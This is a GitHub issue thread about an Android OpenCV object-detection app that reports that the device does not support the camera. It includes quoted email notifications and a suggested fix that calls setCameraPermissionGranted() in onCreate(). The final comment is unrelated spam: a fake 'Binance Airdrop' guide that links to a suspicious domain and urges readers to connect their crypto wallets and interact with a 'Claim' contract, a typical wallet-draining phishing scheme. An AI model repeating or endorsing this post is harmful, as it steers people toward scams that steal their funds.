### ISSUE TITLE
not support cameras 

### ISSUE THREAD

**Issue by ShiJing123** [Ickarus/AndroidObjectDetection-OpenCV#3]
hi,I have a problem when I install the app on my phone and It goes wrong: "It seems that your device does not support camera(or It is locked)",What can be done about it?  thank you.

**Comment by nopointer** [comment]
yes. my device is xiaomi Mix2s------------------ 原始邮件 ------------------
发件人: "ShiJing123"<notifications@github.com>
发送时间: 2019年11月15日(星期五) 下午3:22
收件人: "matteomedioli/AndroidObjectDetection-OpenCV"<AndroidObjectDetection-OpenCV@noreply.github.com>;
抄送: "Subscribed"<subscribed@noreply.github.com>;
主题: [matteomedioli/AndroidObjectDetection-OpenCV] not support cameras (#3)



hi,I have a problem when I install the app on my phone and It goes wrong: "It seems that your device does not support camera(or It is locked)",What can be done about it?,thank you
 
&mdash;

**Comment by nopointer** [comment]
I also found the same problem, not just why




------------------&nbsp;原始邮件&nbsp;------------------
发件人:&nbsp;"ShiJing123"<notifications@github.com&gt;;
发送时间:&nbsp;2019年11月15日(星期五) 下午3:22
收件人:&nbsp;"matteomedioli/AndroidObjectDetection-OpenCV"<AndroidObjectDetection-OpenCV@noreply.github.com&gt;;
抄送:&nbsp;"Subscribed"<subscribed@noreply.github.com&gt;;
主题:&nbsp;[matteomedioli/AndroidObjectDetection-OpenCV] not support cameras  (#3)




hi,I have a problem when I install the app on my phone and It goes wrong: "It seems that your device does not support camera(or It is locked)",What can be done about it?,thank you

**Comment by MohammadSaeedNasiri** [comment]
Add
cameraBridgeViewBase.setCameraPermissionGranted();
to OnCreate() and test it!

**Comment by Vishnuraj2mail** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

Participantes: @abhi5154, @tawhan695, @tosmart01, @gamankr, @0xking-sol
